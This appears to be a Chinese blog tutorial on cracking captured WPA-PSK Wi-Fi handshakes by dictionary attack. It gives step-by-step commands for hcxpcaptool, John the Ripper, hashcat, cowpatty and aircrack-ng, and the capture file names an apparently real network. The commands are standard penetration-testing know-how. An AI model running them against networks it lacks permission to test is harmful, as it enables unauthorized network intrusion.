John

@ john the ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如des、md4、md5等。它支持多种不同类型的系统架构,包括unix、linux、windows、dos模式、beos和openvms,主要目的是破解不够牢固的unix/linux系统密码。

先将抓到的握手包转变为John的专用格式

hcxpcaptool -j 11.john 11.cap

这里11.cap就是我们抓到的握手包
001.jpg

载入字典进行破解

john -w:/root/zidian/pass.txt --format=wpapsk  11.john

其中/root/zidian/pass.txt为我们的字典路径
002.jpg
可以看到,密码已经跑出来了。当然我们也可以用下面命令查看当前的密码

john --show 11.john

003.jpg

hashcat

同样还是先将cap包转变为hashcat的包

hcxpcaptool -o 22.hccapx hs/handshake_ChinaNetfDtL_80-C7-C5-34-29-9D_2019-03-14T21-51-35.cap

进行跑字典

hashcat --quiet -m 2500 22.hccapx /root/zidian/pass.txt --force

若提示如下:
004.jpg

一般是虚拟机中kali没有安装显卡驱动造成的,因为hashcat支持用显卡来提高破解速度。只需要安装显卡驱动就行了。如果实在不行,你在windows下安装hashcat即可。

cowpatty

先看帮助文档

cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Usage: cowpatty [options]

    -f     Dictionary file
    -d     Hash file (genpmk)
    -r     Packet capture file
    -s     Network SSID (enclose in quotes if SSID includes spaces)
    -c     Check for valid 4-way frames, does not crack
    -h     Print this help information and exit
    -v     Print verbose information (more -v for more verbosity)
    -V     Print program version and exit

所以格式为:

cowpatty -f 字典 -r 握手包.cap -s 无线网名称

实例:
005.jpg

aircrack

帮助文档:

aircrack-ng -a 2 -w 字典 --bssid 80:C7:C5:34:29:9D  握手包.cap

006.jpg

总结
总的来说,每个软件各有优势也各有缺点。就拿hashcat来说,是破解速度最快的一个,但是需要显卡的支持。没有好显卡还是起不了多大的作用。

Last modification:April 28th, 2019 at 03:53 pm
正在沿街乞讨中……